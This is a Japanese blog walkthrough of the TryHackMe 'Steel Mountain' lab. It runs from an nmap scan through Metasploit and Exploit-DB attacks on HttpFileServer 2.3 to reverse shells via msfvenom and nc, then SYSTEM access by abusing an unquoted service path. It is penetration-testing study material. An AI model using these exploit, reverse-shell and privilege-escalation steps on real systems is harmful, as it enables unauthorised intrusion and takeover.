はじめに
TryHackMe という Hack the Box のようなサービスを最近やっています。 https://tryhackme.com/
その中の Steel Mountain という machine をやっていきます
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
nmap
root@kali:~# nmap -sV -sC 10.10.217.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 12:23 UTC
Nmap scan report for ip-10-10-217-52.eu-west-1.compute.internal (10.10.217.52)
Host is up (0.00040s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-04-30T12:25:06+00:00; +1s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:44:3D:25:E8:22 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:44:3d:25:e8:22 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-30T12:25:01
|_ start_date: 2020-04-30T12:23:07
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.23 seconds
exploit
HttpFileServer 2.3 が動いているので CVE-2014-6287 を利用します https://www.exploit-db.com/exploits/39161
metasploit を使用します
msf5 > search httpfileserver
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
諸々設定して run します
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.245.227:4444
[*] Using URL: http://0.0.0.0:8080/Xxa80jSiWx
[*] Local IP: http://10.10.245.227:8080/Xxa80jSiWx
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /Xxa80jSiWx
[*] Sending stage (180291 bytes) to 10.10.217.52
[*] Meterpreter session 1 opened (10.10.245.227:4444 -> 10.10.217.52:58069) at 2020-04-30 13:00:00 +0000
[!] Tried to delete %TEMP%\StrHYWOhBpRtio.vbs, unknown result
[*] Server stopped.
meterpreter >
meterpreter のシェルが取れたのでこれで user.txt が取得できます
privilege escalation
PowerUp.ps1 なるものがあるようなので meterpreter から upload します https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 使い方 https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
C:hogehoge > powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”
(省略)
[*] Checking for unquoted service paths...
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced
SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users;
Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path
<HijackPath>
CanRestart : True
(省略)
以下の用に unquoted service path はそこに別のプログラムを置くことで任意のコマンドを実行できる可能性があります。 引用符で囲まれていないプログラムパスの処理問題
また、CanRestart: True
であることから service をリスタート、すなわち unquoted service paths の部分を利用して配置した任意コマンドを実行できます。
msfvenom で payload を exe の形式で作成して、
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.245.227 LPORT=1111 -f exe -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: Advanced.exe
作成した Advanced.exe を meterpreter の upload コマンドを通して、C:\Program Files (x86)\IObit\
に配置します。
meterpreter > cd "\Program Files (x86)\IObit"
meterpreter > upload Advanced.exe
[*] uploading : Advanced.exe -> Advanced.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): Advanced.exe -> Advanced.exe
[*] uploaded : Advanced.exe -> Advanced.exe
以下のコマンドで AdvancedSystemCareService9 をリスタートします
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
これで root が取れました
root@kali:~# nc -lnvp 1111
listening on [any] 1111 ...
connect to [10.10.245.227] from (UNKNOWN) [10.10.93.43] 50263
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
metasploit なしで攻略してみる
同じものですが、以下の exploit を使います https://www.exploit-db.com/exploits/39161
以下の writeup が役立ちそうです(Hack the Box の wruteup です) https://medium.com/@ranakhalil101/hack-the-box-optimum-writeup-w-o-metasploit-3a912e1c488c
root@kali:~# locate nc.exe
/usr/share/windows-resources/binaries/nc.exe
root@kali:~# cp /usr/share/windows-resources/binaries/nc.exe ./
root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
root@kali:~# nc -lnvp 1112
listening on [any] 1112 ...
shell1 と shell2 で待ち受けて実行します
root@kali:~# python exploit.py 10.10.93.43 8080
root@kali:~# python exploit.py 10.10.93.43 8080
(複数回実行が必要です)
root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.93.43 - - [30/Apr/2020 15:40:02] "GET /nc.exe HTTP/1.1" 200 -
root@kali:~# nc -lnvp 1112
listening on [any] 1112 ...
connect to [10.10.245.227] from (UNKNOWN) [10.10.93.43] 50307
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
whoami
steelmountain\bill
user が取れました これ以降はほぼ同じなので割愛します
終わりに
OSCP の Learning Path に乗ってるだけあって metasploit なしの方法もしっかり誘導があって良い感じでした。 unquoted service paths を利用した置き換えは初見だったのでホェーとなりました